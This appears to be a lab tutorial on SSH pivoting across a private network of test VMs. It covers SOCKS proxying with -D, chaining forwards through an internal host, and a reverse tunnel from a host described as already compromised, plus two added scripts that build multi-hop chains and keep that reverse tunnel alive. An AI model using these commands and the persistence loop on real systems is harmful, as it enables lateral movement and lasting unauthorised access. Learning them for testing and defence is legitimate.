I have set up a small test network of three Debian VMs and my attack VM.
- chicken (192.168.1.244)
- porkchop (192.168.1.243)
- steak (192.168.1.184)
- attackVM (192.168.1.134)
The steak VM has a web server with a simple PHP page that displays the visitor's IP address.
<html>
<body>
<p>Did you say steak?</p>
<p><?php echo $_SERVER['REMOTE_ADDR']; ?></p>
</body>
</html>
Browsing with no intermediary hops.
attackVM $ curl http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.134</p>
</body>
</html>
Hosts involved:
- chicken (192.168.1.244)
- attackVM (192.168.1.134)
This is simple utilization of the -D flag in the ssh client: -D opens a SOCKS listener on the attack VM whose traffic exits from chicken, and -N tells ssh not to run a remote command, so the session exists only to carry the forwarded traffic.
attackVM $ ssh -N -D 8282 [email protected]
Configure the browser in attackVM to use a SOCKS proxy on 127.0.0.1:8282, since we selected 8282 for our SOCKS listener via -D. Browse to steak and we'll see that our IP is now 192.168.1.244, meaning we've connected through chicken.
attackVM $ curl --socks5 127.0.0.1:8282 http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.244</p>
</body>
</html>
Hosts involved:
- chicken (192.168.1.244)
- porkchop (192.168.1.243)
- attackVM (192.168.1.134)
Now I'm going to use chicken as a staging server which has access to an "internal" server, porkchop. We'll establish an SSH connection between chicken and porkchop with a SOCKS listener on chicken, then forward that SOCKS port back to our attack VM and use it to browse through porkchop.
attackVM $ ssh [email protected]
tuna@chicken:~$ ssh -N -D 8484 -p 4444 [email protected]
The SSH connection is now established between chicken and porkchop. Let's forward the SOCKS port 8484 to our attack VM.
attackVM $ ssh -N -L 127.0.0.1:44444:127.0.0.1:8484 [email protected]
Here we've forwarded the SOCKS listener on port 8484 of chicken to our local port 44444. The forward targets 127.0.0.1:8484 rather than chicken's address because -D binds to loopback by default, so the listener on chicken is only reachable from chicken itself. Configure the browser in attackVM to use a SOCKS proxy on 127.0.0.1:44444, since we selected 44444 for forwarding our SOCKS listener via -L. Browse to steak and we'll see that our IP is now 192.168.1.243, meaning we've connected through porkchop.
attackVM $ curl --socks5 127.0.0.1:44444 http://steak.test.ssh/steak.php
<html>
<body>
<p>Did you say steak?</p>
<p>192.168.1.243</p>
</body>
</html>
The key part here is that only the last hop is dynamic (-D). All other listeners should be static (-L), each one pulling the SOCKS listener one hop closer to the attack VM, so another intermediary host just means one more -L stage.
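To generalize the single-hop and two-hop chains above to any number of hops, here is an added helper script (my example, not code from the original page) that emits the ssh commands and the host each must be run on, following the rule just stated: -D on the final hop, -L on every earlier one, each -L pointing at the loopback port of the next hop. The user names (tuna on both chicken and porkchop), the explicit 127.0.0.1 binds and the intermediate port numbering (local port plus 1000 per hop) are assumptions of the example, not taken from the page.

```shell
#!/bin/sh
# Added example, not from the original page: emit the ssh commands for an
# N-hop SOCKS chain built the way the page builds its two-hop chain.
#   attackVM -> hop1 -> hop2 -> ... -> hopN
# The last hop gets -D (a SOCKS listener on hopN-1, or on attackVM if N=1);
# every earlier hop pulls that listener one step closer with -L.
# Hop format: user@host[:sshport]   (port defaults to 22; IPv4/hostnames only)

hop_target() { printf '%s' "${1%%:*}"; }                                        # user@host
hop_port()   { case "$1" in *:*) printf '%s' "${1##*:}";; *) printf '%s' 22;; esac; }

# chain_plan LOCAL_SOCKS_PORT HOP1 [HOP2 ...]
# Prints "[where] command" lines, far end first, in the order they are run.
# Every listener is bound to 127.0.0.1: that is what -D/-L do by default
# (no GatewayPorts), so each -L targets 127.0.0.1:<port> on the NEXT hop.
# Port on host k of the chain (k=0 is attackVM) = LOCAL_SOCKS_PORT + 1000*k
# (a numbering chosen for this example; the page uses 44444 and 8484).
chain_plan() {
  cp_local=$1; shift
  cp_n=$#
  [ "$cp_n" -ge 1 ] || { printf 'chain_plan: need at least one hop\n' >&2; return 1; }
  cp_i=$cp_n
  while [ "$cp_i" -ge 1 ]; do
    eval "cp_hop=\${$cp_i}"                        # hop i, counted from attackVM
    cp_lport=$((cp_local + 1000 * (cp_i - 1)))     # listener port on host i-1
    if [ "$cp_i" -eq 1 ]; then
      cp_where=attackVM
    else
      eval "cp_prev=\${$((cp_i - 1))}"
      cp_where=$(hop_target "$cp_prev")            # the command is typed on hop i-1
    fi
    if [ "$cp_i" -eq "$cp_n" ]; then
      # final hop: dynamic SOCKS listener
      printf '[%s] ssh -N -D 127.0.0.1:%s -p %s %s\n' \
        "$cp_where" "$cp_lport" "$(hop_port "$cp_hop")" "$(hop_target "$cp_hop")"
    else
      # intermediate hop: static forward to the next hop's loopback listener
      printf '[%s] ssh -N -L 127.0.0.1:%s:127.0.0.1:%s -p %s %s\n' \
        "$cp_where" "$cp_lport" "$((cp_lport + 1000))" "$(hop_port "$cp_hop")" "$(hop_target "$cp_hop")"
    fi
    cp_i=$((cp_i - 1))
  done
}

# Plan for the page's lab (user names assumed): attackVM -> chicken -> porkchop on 4444
chain_plan 44444 tuna@192.168.1.244 tuna@192.168.1.243:4444
```

Run it with one hop and it reproduces the single -D command from the first scenario; with two hops it prints the -D on chicken followed by the -L on attackVM; a third hop simply adds another -L stage, which is the point of the rule above.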
Hosts involved:
- chicken (192.168.1.244)
- steak (192.168.1.184)
- attackVM (192.168.1.134)
In this scenario, let's assume we've got a shell on steak but cannot connect to it directly from our attackVM. Instead, we'll set up a reverse tunnel from steak to chicken, then establish a new connection from attackVM to chicken and connect locally on chicken into the tunnel to reach our shell on steak.

First set up the tunnel from steak to chicken. In this case, we have created an SSH key pair on steak and added the public key to ~chicken/.ssh/authorized_keys on chicken, so the tunnel can be started from steak without an interactive password.
filet@steak:~$ ssh -o StrictHostKeyChecking=no -o TCPKeepAlive=yes -p 22 -N -f -R 6666:127.0.0.1:5555 [email protected]
Note that SSH is listening on port 5555 on steak, and on the default 22 on chicken. The -R listener on port 6666 is bound to chicken's loopback interface (the default unless GatewayPorts is enabled in chicken's sshd_config), which is why the next step connects to localhost on chicken rather than to its address. Next we'll connect to chicken from attackVM and then complete the connection to steak via the exposed listener.
attackVM $ ssh [email protected]
tuna@chicken:~$ ssh -p 6666 filet@localhost
filet@localhost's password:
filet@steak:~$ hostname --fqdn
steak.test.ssh
Now we have access to our shell on steak using chicken as an intermediary hop.
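As an added example (mine, not from the page), the reverse tunnel from the compromised host can be wrapped in a small supervisor so that it comes back when the connection drops and fails loudly if port 6666 is already taken on chicken, rather than relying on the one-shot `-f` command above. ExitOnForwardFailure, ServerAliveInterval and ServerAliveCountMax are standard OpenSSH client options; the user name `chicken` on chicken, the retry interval and the explicit loopback bind on the -R side are assumptions of the example.

```shell
#!/bin/sh
# Added example, not from the original page: supervise the reverse tunnel
# steak -> chicken so the sshd on port 5555 of steak stays reachable from chicken.
# Differences from the page's one-shot "-f -R 6666:127.0.0.1:5555" command:
#   - ExitOnForwardFailure=yes: if chicken already has something on 6666,
#     ssh exits instead of silently leaving a session with no tunnel
#   - ServerAliveInterval/CountMax: a dead path is noticed in ~90 s (30 s x 3)
#   - the listener is bound to 127.0.0.1 on chicken explicitly (also the
#     default without GatewayPorts), so only a local login on chicken can
#     reach it, as in the page's "ssh -p 6666 filet@localhost" step
#   - a retry loop instead of -f, so a dropped connection is re-established

# is_port N: true if N is an integer in 1..65535
is_port() { case "$1" in ''|*[!0-9]*) return 1;; esac; [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; }

# reverse_tunnel_cmd REMOTE_PORT LOCAL_SSHD_PORT USER@CHICKEN [IDENTITY_FILE]
# Prints the ssh command line; returns 1 on a malformed port.
reverse_tunnel_cmd() {
  is_port "$1" && is_port "$2" || { printf 'reverse_tunnel_cmd: bad port\n' >&2; return 1; }
  rt_id=""
  [ -n "${4:-}" ] && rt_id=" -i '$4'"
  printf 'ssh -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 -N%s -R 127.0.0.1:%s:127.0.0.1:%s %s' \
    "$rt_id" "$1" "$2" "$3"
}

# keep_reverse_tunnel REMOTE_PORT LOCAL_SSHD_PORT USER@CHICKEN [IDENTITY_FILE] [RETRY_SECS]
# Runs the tunnel in the foreground and restarts it whenever it exits; put it
# in the background yourself (nohup ... &) on the compromised host.
keep_reverse_tunnel() {
  rt_cmd=$(reverse_tunnel_cmd "$1" "$2" "$3" "${4:-}") || return 1
  rt_wait=${5:-10}
  while :; do
    # ports were validated above, so eval on our own string is safe here
    eval "$rt_cmd" || printf 'tunnel exited (%s); retrying in %ss\n' "$?" "$rt_wait" >&2
    sleep "$rt_wait"
  done
}

# Usage on steak (user name on chicken and key path assumed):
#   keep_reverse_tunnel 6666 5555 chicken@192.168.1.244 ~/.ssh/id_ed25519
reverse_tunnel_cmd 6666 5555 chicken@192.168.1.244; echo
```

StrictHostKeyChecking=no is kept from the page because the first connection from steak has no known_hosts entry for chicken; on a box you control, pinning chicken's host key instead is the safer choice.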